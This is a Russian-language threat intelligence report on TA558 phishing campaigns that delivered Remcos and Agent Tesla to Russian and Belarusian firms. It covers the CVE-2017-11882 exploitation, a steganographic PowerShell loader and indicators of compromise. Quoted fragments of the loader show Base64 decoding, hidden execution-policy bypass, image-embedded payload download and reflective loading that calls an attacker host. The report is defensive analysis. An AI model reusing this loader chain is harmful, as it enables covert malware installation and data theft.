Тайное послание: уловки стеганографии ТА558 в кибератаках на предприятия России и Беларуси

С начала 2024 года аналитики F.A.C.C.T. Threat Intelligence зафиксировали более тысячи фишинговых рассылок вредоносного ПО, направленных на предприятия, государственные учреждения и банки в России и Беларуси.  Целью этих рассылок была кража данных и получение доступа к внутренним системам организаций. Аналитики департамента Threat Intelligence тщательно изучили содержимое рассылок и атрибутировали эти атаки к группе ТА558.

TA558 — это киберпреступная группировка, которая занимается проведением фишинговых кампаний и распространением вредоносного программного обеспечения, ведущая свою активность с 2018 года. Основные цели группы — это финансовые учреждения, государственные организации и компании из туристической отрасли. Группа активно использует многоэтапные фишинговые атаки,  различные методы социальной инженерии для внедрения вредоносных программ на компьютеры своих жертв, размещение полезной нагрузки на легитимных серверах, а также вредоносное ПО для кражи данных и удаленного контроля над системами жертв.

Кроме указанных признаков ТА558, в новых атаках специалисты F.A.C.C.T выявили характерные для группировки методы стеганографии, то есть сокрытия информации внутри файлов или изображений, при передачи полезной нагрузки, а также использование вредоносных файлов, в именах которых были слова «Love» и «Kiss».

Большинство изученных писем содержали вредоносное программное обеспечение (ВПО) Agent Tesla или Remcos, относящееся к классу Remote Administration Tools (RAT). После запуска на компьютере жертвы, ВПО закрепляется в системе, скрывается от пользователя и предоставляет атакующему доступ к зараженному устройству. Это позволяет злоумышленнику выполнять различные действия: захватывать видео с веб-камеры, управлять буфером обмена и мышью, отображать уведомления, загружать и запускать файлы, собирать информацию о системе, скрывать экраны и окна операционной системы, записывать аудио и нажатия клавиш, а также похищать пользовательские данные.

Несмотря на то, что атаки ТА558 становятся всё более сложными и изощрёнными, система защиты от сложных и неизвестных угроз F.A.C.C.T. Managed XDR перехватила и заблокировала все вредоносные письма, направленные в адрес наших клиентов.

Исследование атак

В ходе одной из атак, зафиксированной 5 марта 2024, злоумышленниками использовалась электронная почта expo@bcmsrll[.]com, привязанная к домену bcmsrll[.]com (зарегистрирован 22.06.2023 у регистратора Namecheap Inc. США).

С помощью графа сетевой инфраструктуры системы F.A.C.C.T. Threat Intelligence была выявлена связь, указывающая на использование данного домена атакующим TA558 в ходе проведения фишинговой атаки на один из банков Республики Беларусь в марте 2024 года.

 

TA558 известна своим использованием многоэтапных атак, начиная с фишинговых писем, содержащих вредоносные документы Microsoft Office, которые, в свою очередь, загружают и запускают вредоносные программы. В их арсенале находятся такие вредоносные программы, как AgentTesla, Remcos, njRAT и другие.

Группа часто изменяет свои тактики, методы и процедуры (TTP), чтобы избежать обнаружения и затруднить анализ их деятельности. В последнее время TA558 проявляет повышенную активность, используя более сложные техники маскировки и эмуляции легитимного поведения, что позволяет им эффективно обходить системы защиты.

Первоначальным регионом, на который была нацелена TA558 в 2018 году, являлась Латинская Америка, но позже они расширили географию атак. Их фишинговые кампании часто проводятся на нескольких языках, что указывает на глобальный масштаб операций группы.

Начало атаки

В ходе исследования специалисты компании F.A.C.C.T. выяснили, что за период с 1 января 2024 года по 25 мая 2024 года злоумышленники перемещали домен bcmsrll[.]com между тремя различными хостами.

С декабря 2023 домен был зарегистрирован на IP-адресе 185[.]236[.]228[.]95, принадлежащем провайдеру blazingfast[.]io. Затем в марте 2024 его переместили на 216[.]9[.]224[.]70, принадлежащем провайдеру dchost[.]com, а после — в мае 2024 на другой IP этого же провайдера, 213[.]142[.]149[.]158. Именно на последнем он оставался до 18 июня 2024 года.

На данных хостах злоумышленники устанавливали, настраивали и запускали почтовый сервер AutoSMTP (hxxps://www.autosmtp[.]com). В процессе настройки сервера он привязывался к домену, с привязкой к которому создавались адреса электронной почты, которые использовались для рассылки вредоносных писем.

Так, с начала 2024 года системой F.A.C.C.T. Managed XDR  было перехвачено 202 фишинговых письма, направленных с адресов электронной почты export@bcmsrll[.]com, expo@bcmsrll[.]com, info@bcmsrll[.]com и contact@bcmsrll[.]com, созданных на указанном домене.

Направленные письма были на русском, английском, турецком, румынском и итальянском языках. Язык выбирался в зависимости от географического расположения компании, от имени которой отправлялось письмо. Это позволило атакующим создать иллюзию доверия и значительно повысить вероятность успеха атаки.

Кроме того, электронные письма могли быть направленны как целевым образом, с указанием в тексте письма обращения к конкретному получателю, так и в ходе массовой рассылки — без какой-либо конкретики.

Информация о компаниях-отправителях, указанных в фишинговых письмах, выглядит полностью достоверной. Атакующие подбирали такие детали, чтобы создать иллюзию легитимности, и этим вводили пользователей в заблуждение.

Как только пользователь открывал такое письмо, он сталкивался с известным брендом, логотипом, убедительным текстом, который подталкивал его к дальнейшим действиям. В частности, в письме содержались четкие указания на необходимость запуска вложенного файла.

Вредоносное вложение

В случае запуска файла-вложения, формат которого был «.docx» или «.xls», происходил запуск макроса, посредством которого осуществлялось направление запроса к ресурсу hxxp://tau[.]id/0vzd8, информация о котором содержалась в теле файла.

В ходе анализа сетевого трафика, зафиксированного 29.01.2024, после осуществления ВПО доступа по указанному URL адресу, сервер вернул ответ «Moved Permanently», в заголовке «location» которого сообщил о новом пути, по которому находится интересующий ресурс. В указанном случае возвращена ссылка на документ  hxxp://139[.]144[.]212[.]135/sbi/microsoftupdationgoingformicrftofficeupgradingtonewmsofficeprotoecoltoreducethesystemwrking.doc.

Кроме указанных действий, макрос из вредоносного вложения развивает еще одно направление атаки, в ходе которого с указанного хоста осуществляется загрузка VBS скрипта «xmass.vbs».

Xmass.vbs эксплуатирует уязвимость редактора уравнений в пакете Microsoft Office, известную как CVE-2017-11882, которая связана с ошибкой в обработке объектов оперативной памяти. В результате эксплуатации этой уязвимости при открытии специально созданного документа происходит переполнение буфера, что позволяет злоумышленникам выполнить произвольный код в системе жертвы.

Использование стеганографии

При дальнейшей эксплуатации ВПО осуществляет вызов Windows PowerShell, которому передаются параметры, извлеченные из файла xmass.vbs.

Как видно из представленных изображений, параметр передается с использованием методов стеганографии, что в свою очередь осуществляется с целью предотвращения возможного детектирования запускаемых процессов и инъекций в действующие.

В указанном случае переменная $codigo содержит в себе строку с данными, закодированными в формате Base64.

Метод $oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace(‘DgTre’,’A’) )) заменяет в указанной строке все вхождения подстроки «DgTre» на символ «А», после чего декодирует строку и преобразует её в Unicode, а далее запускает, после чего запускает новый скрытый экземпляр Windows PowerShell, содержащий декодированные данные powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OwjuxD.

В результате полученный скрипт осуществляет запуск другой версии PowerShell, находящейся по пути C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, в скрытом режиме (-windowstyle hidden) и с обходом политики выполнения скриптов (-executionpolicy bypass), а также использованием минимального профиля (-noprofile), что позволяет не загружать пользовательские профили.

Далее переменной $imageUrl присваивается адрес ресурса, на котором находится изображение hxxps://wallpapercave[.]com/uwp/uwp4246971.png, после чего осуществляется скачивание указанного изображения, его преобразование в байткод и его присвоение в переменную $imageBytes = $webClient.DownloadData($imageUrl)).

Далее байты изображения  преобразовываются в строку с использованием кодировки UTF-8 ($imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes)), после чего, с использованием специальных индексов расположенных в текстовой строке, осуществляется поиск начала и конца строки закодированной в Base64 ($startFlag = ‘<<BASE64_START>>’ и $endFlag = ‘<<BASE64_END>>’),

а после их нахождения извлекает строку и производит её декодирование  из Base64 ($base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command)).

Далее загружает декодированные байты как сборку .NET ($loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes)), после чего получает тип Aspose.DrawingSpec.PkikAttrCertNB из загруженной сборки, вызывает метод Run и передает ему параметры ($type.GetMethod(‘Run’).Invoke($null, [object[]] (‘http://139.144.212.135/222/GST.txt’ , ‘desativado’ , ‘2’ , ‘CHSE’ , ‘1’ , ‘C:\ProgramData\’, ‘LnkName’,’RegAsm’)), в результате чего осуществляется создание процесса Regasm.exe, посредством которого происходит заражение устройства трояном Remcos.

Клиенты F.A.C.C.T. Threat Intelligence могут получить аналогичные детальные отчеты о действиях заблокированного при атаках на них или загруженного ими ВПО, с отображением ветвей процессов и используемыми тактиками и техниками в подразделе «Детонация ВПО» раздела «Трояны».

Выявление рассылки

Аналогичным образом специалистами компании F.A.C.C.T. осуществлен анализ всех экземпляров ВПО, находящихся во вложениях указанных писем, в ходе которого выявлено 23 уникальных экземпляра.

Распространение указанных файлов осуществлялось атакующими с использованием адресов электронной почты, привязанных как к указанному доменному имени, так и к вновь выявленным:

Всего за период времени с 01.01.2024 по 25.05.2024 атакующими ТА558 с использованием указанных доменных имен в адреса  производственных предприятий, учреждений государственного и банковского сектора  Российской Федерации и Республики Беларусь было направлено 1022 электронных письма, содержащих в себе ВПО.

Атрибуция атаки к TA558

Анализ обнаруженных образцов позволил специалистам компании F.A.C.C.T. связать данную атаку с ТА558 по следующим признакам:

• Использование длинных цепочек атак;
• Использование методов стеганографии, в ходе которых полезная нагрузка размещалась в изображениях и закодированных текстовых файлах;

• Использование легитимных файлообменников для хранения файлов и изображений содержащих полезную нагрузку;

• Использование вредоносных файлов, имена которых состоят из многочисленных слов и в большинстве своём связаны со словами « Love» и «Kiss». Вместе с тем, в ходе анализа атак, нами обнаружены как уже указанные названия файлов, так и названия, связанные с обновлением программного обеспечения и животным миром.

Аналогичные особенности атак ТА558 отображены в отчетах исследователей:

• https://www.proofpoint.com/us/blog/threat-insight/reservations-requested-ta558-targets-hospitality-and-travel
• https://cyble.com/blog/threat-actor-employs-powershell-backed-steganography-in-recent-spam-campaigns/
• https://www.metabaseq.com/ta588/
• https://x.com/ankit_anubhav/status/1689585087267188736
• https://www.ptsecurity.com/ru-ru/research/pt-esc-threat-intelligence/operaciya-steganoamor-ta558-massovo-atakuet-kompanii-i-gosudarstvennye-uchrezhdeniya-po-vsemu-miru/

Кроме того, в указанных атаках использовались услуги ресурса withheldforprivacy[.]com (предоставляет услуги сокрытия реальных данных) при осуществлении регистрации доменных имен.

Ключевые выводы

Проанализированная специалистами компании F.A.C.C.T. фишинговая кампания, развернутая группировкой TA558, демонстрирует значительное развитие данного вектора атак. Злоумышленники применяют ухищренные методы сокрытия и доставки ВПО, а также тщательно готовятся к каждой атаке, используя ранее не засвеченные хосты и домены.

Примечательно, что атакующие продолжают эксплуатировать уязвимость 2017 года, выявленную в Microsoft Office (CVE-2017-11882), несмотря на то, что она уже устранена в новых версиях продукта. Это свидетельствует о том, что такие атаки по-прежнему успешны и эффективны. Более того, использование устаревших уязвимостей указывает на недостаточно обновление систем у многих пользователей, что позволяет злоумышленникам легко проникать в их сети.

В последнее время TA558 стала использовать ещё более изощренные методы социальной инженерии, чтобы убедить пользователей открыть вредоносные вложения. Они маскируют свои письма под легитимные сообщения от известных компаний, что значительно увеличивает вероятность успеха атаки.

В связи с этим, мы полагаем, что TA558 продолжит осуществление рассылок вредоносного ПО указанным способом, совершенствуя свои методы и адаптируясь к новым условиям.

Рекомендации

Для предотвращения и защиты от возможных кибератак со стороны группы ТА558 специалисты компании F.A.C.C.T. рекомендуют следующие меры:

1. Регулярно обновляйте все установленное ПО. В частности, при использовании Microsoft Office 2019 и выше уязвимость CVE-2017-11882, связанная с переполнением буфера, не будет проэксплуатирована.
2. Регулярно обучайте сотрудников методам распознавания фишинга и других форм социальной инженерии. Это поможет сделать их менее уязвимыми.
3. Используйте передовые решения для защиты электронной почты, с целью предотвращения вредоносных рассылок. Рекомендуем ознакомиться с возможностями F.A.C.C.T. Business Email Protection для эффективного противодействия таким атакам.
4. Внедряйте современные средства для обнаружения и реагирования на киберугрозы. Рекомендуем рассмотреть решение F.A.C.C.T. Managed XDR, которое использует многочисленные источники телеметрии и передовые технологии машинного обучения для выявления угроз и реагирования на них.
5. Применяйте данные F.A.C.C.T. Threat Intelligence для обнаружения угроз и проведения проактивного поиска. Это поможет вовремя идентифицировать и нейтрализовать потенциальные опасности.

Эти меры помогут значительно повысить уровень защиты ваших систем и данных от кибератак.

Индикаторы компрометации

Файловые индикаторы

swift.xls

• MD5: fa8159d551c83cd7d529dcd3a7476961
• SHA-1: e02e7147bfb77619291fa222bda9bb3ce4761468
• SHA-256: 8d12cfdb1376c99139b8dba94a0c02357bf7652b763d6313d70dde912266905f

Offer 15492024 & 15602024.docx

• MD5: 0d0f500d82551e733eab0fb1060a49da
• SHA-1: 1e9af5dd484358b007673b0d7f9b85f8ac1a7b6c
• SHA-256: d5e214f3096564dfc3e348b6a3ac6aeefed75d785ac7cfab5d3019f67fdbc9be

Sipariş detayları.xls

• MD5: e1424a6dc9fa951366f2996cd537dd02
• SHA-1: 967bf96dfb11dee4e1d711c809f8c9fedc29fa69
• SHA-256: 4cc7a5fe2d2ffafda3791f0e9cced8f7fe430b598551c2a9277210e87e6df53b

ORDIN.xls

• MD5: 8f82df8963d12e63c11d24991271c888
• SHA-1: 205aa52dc1b466bb0ff5f5976288aa84e02b94e7
• SHA-256: 4d97a5069b154b2e95af235dd32c82c1bf5b2e4cf2d188067da223f488ebaa48

Order Req. March.docx

• MD5: 656b3681763db100b7ea580d97a16983
• SHA-1: 76641a0aace92c72654df9b16961d2c09ab25352
• SHA-256: 55f02d8a8f8fe958eeb020593b48d25c86238bd2a7746b9c7b7e4afa9e88c315

Order sheet RF083901.docx

• MD5: f83f9fd222724c38642f889e4bff6dbc
• SHA-1: 3993bebae6d4c5c0b0e494472f8f3973367d7f39
• SHA-256: c0e49a1256f7e6b66607f2440219ce5e684bd591fc1fb7c64b90e9b9218374a9

P.O.27000446.docx

• MD5: 11f0c45a84392c11e8d276dc6cfb429a
• SHA-1: 3a2a02046c5ae2b4cd82b425890e198f41adf11a
• SHA-256:  0f9a81081fd7ff58c83c78bcfa4735556fd3ad823f917fe28787085f2d309336

swift_3094.docx

• MD5: 49a3ee37781cac92181f0c1c80e5fb0d
• SHA-1: 6d6d1889835319c81e546728d4ec6f965ece85f0
• SHA-256: bc46b7b44928f6ad586d787db33f53ed962aab72441a5518efb3e971d36a40e2

Yeni fatura.docx

• MD5: 9818f83f09da7f225a28153ad607e821
• SHA-1: 8bd40194c741c9ac9ee50c348981edca15a5519d
• SHA-256: fda7e2d7a3ee70355988afc70ee4d6ebf08b76ef38f4504aa1cf5f8fa9a99b2e

Applicazione di pagamento.docx

• MD5: ff3acc46bc2eaeccd03be2ff5fc3d0ec
• SHA-1: cbd16f778666a312e141fdb1127e3ad8dc7b1712
• SHA-256: 383ee0319fade807fd02f12a92d4f2b98ba7137f27212b996f3cc9bd88f278ac

Подтверждение заказа.xls

• MD5: 368188588ec06a0096f2430a2f98001e
• SHA-1: c049a051e51692f7ae82326c66a7d2a37a1d7054
• SHA-256: 91a14852328b337a5aa1046bc7f92448f2c0a3c2ec5a8a76729de68521fa2a39

MSKUJH662020SE.docx

• MD5: e035324087c878d26291105f711f1a2b
• SHA-1: 86c9cf7d6085507f03c2dcb8d719e43e099c1309
• SHA-256: eecb89aaf97fa8333c2c56c16e3905b2b2764271d7f7944bc71a8aba64d2906c

Kopia płatności.docx

• MD5: 1832d5dcd354aacfcf9a8e15b2b18311
• SHA-1: c709d65418d77978053aa54a33ca5829cea85d95
• SHA-256: 041c9c4e5242464f8661c6f611da14041447b368e7ff669e5de89e9f805ba486

swift Euro.xls

• MD5: 4a677fc6b7305b4eace2b00ac978fb76
• SHA-1: fc965d88d8ec2f49008f93a7e906fde10cb0b947
• SHA-256: 079de6fa0a294bbab99ca481e03e5d0360cdfae1ab41ffd7cc37a92d7bcc25a1

Shipment Documents.docx

• MD5: f78f79a9955725001e502d0946eb3d00
• SHA-1: 925fe336bbc98797e3efcbddc39695b7b0de5534
• SHA-256: 18b8e4782b590141ff10ecde5b76bd1e35d99890a517741ac71408a478a56a81

New order list.docx

• MD5: 8a10bef8547c837c442a585e36e2370d
• SHA-1: 726afc25dbac5004232d28a2b83deb7603e6b375
• SHA-256: 32562e2a917d9827d3f24ac715a6af7468d627594c90126641349d25b735234f

Оплата 29.01.24.docx

• MD5: 10af82086385c6a2514d222753184317
• SHA-1: df565f479665be322b27cb32cbd0eb513d0290ba
• SHA-256: 295aef7c1199c1f1ed7d487694e977ec858c5819140ed09808e175fcc49472f0

Подтверждение заказа RF0901.docx

• MD5: 1eb3ca66ec1151e2a58284ccf4e1d7c7
• SHA-1: 83b79761ce29359817d147e56529f520b0fdcdd8
• SHA-256:  ea17ccf4bf55f23b8a93f8e17e470be440211f463d5b7e01958843c8c160f765

Copie de plată.docx

• MD5: 277f8f8a7b767860a8e7bf1aeaa1fd6a
• SHA-1: 64142b293363c2a23cbda456023c9fce51b31333
• SHA-256: e2ee9ac33c1e07a99f8cc6044f0a7b830e892fbfbfd7d6e8db916707e9c34035

Ürün listesi.xls

• MD5: 87eabdd9eaf85ac612cc32db307462a1
• SHA-1: 094626fb8ec66ae99ce6157fbe321d114e7fbbf8
• SHA-256: 110502c15e51f07fe6aff0b0a28d128d60a1eb51df09a2b9fb2db0775fe92f28

comandă nouă.xls

• MD5: 87eabdd9eaf85ac612cc32db307462a1
• SHA-1: 094626fb8ec66ae99ce6157fbe321d114e7fbbf8
• SHA-256: 110502c15e51f07fe6aff0b0a28d128d60a1eb51df09a2b9fb2db0775fe92f28

NEW ITEMS LIST 2024.xls

• MD5: db896eece25221a79210eecac8d05822
• SHA-1: fbb32ef65e661cf82b3f539ee61cc5d2dade191b
• SHA-256: a2d5c106ced87a5771490d95bc20c385f8ae49f7e8448b2e68a3c6bf0d96d03b

Dekont.gz

• MD5: 123ba210c4bf018520399cb6e5dd48d8
• SHA-1: eb3c3c80485ec3a6cd10538afe94ff0065d5d7e3
• SHA-256: 6b19f6c758c0b626d1319314e9679d55701e156a9642409e8899a1e7d6a20026

Сетевые индикаторы

Хосты

• 139[.]144[.]212[.]135
• 172[.]232[.]4[.]203
• 45[.]79[.]137[.]187
• 172[.]235[.]133[.]243
• 172[.]233[.]129[.]114
• 172[.]232[.]170[.]236
• 172[.]232[.]163[.]207
• 45[.]74[.]19[.]84
• 70[.]34[.]197[.]128
• 172[.]234[.]217[.]97
• 45[.]56[.]102[.]63
• 172[.]232[.]172[.]53
• 172[.]232[.]189[.]152
• 172[.]232[.]172[.]123
• 172[.]232[.]189[.]7
• 75[.]102[.]51[.]237

Домены

• paste[.]ee/d/spi57
• paste[.]ee/d/0aXad
• tau[.]id/ze87s
• paste[.]ee/d/5nJBg
• paste[.]ee/d/62kvY
• tau[.]id/c9izr
• tau[.]id/34x8c
• paste[.]ee/d/Pz2XE
• ye[.]pe/0y2k
• paste[.]ee/d/VkPF6
• paste[.]ee/d/wsePT
• paste[.]ee/d/S8WBJ
• paste[.]ee/d/tggWc
• paste[.]ee/d/7tUhO
• tau[.]id/y3kre
• paste[.]ee/d/Noi6G
• tt[.]vg/IsjCX
• paste[.]ee/d/oDnyo
• tt[.]vg/PqPsi
• l-to[.]com/ru7285wa
• shtu[.]be/e79171
• en0[.]de/serverrrrr
• qr-in[.]com/HDYwZbx
• isols[.]co/zXTgU
• bot.[]ax/hNZdz
• wallpapercave[.]com/uwp
• tau[.]id/0vzd8
• pluse-tr[.]com
• hdvysy[.]com
• baltictransline[.]store
• automaxtool[.]me
• akcalogistics[.]shop
• naft-dz[.]shop
• vervo[.]lat
• laceys[.]icu
• maximum[.]icu
• biatr[.]ooguy[.]com
• abspedition[.]icu
• midae[.]com
• executivesship[.]com

MITRE ATT&CK® Matrix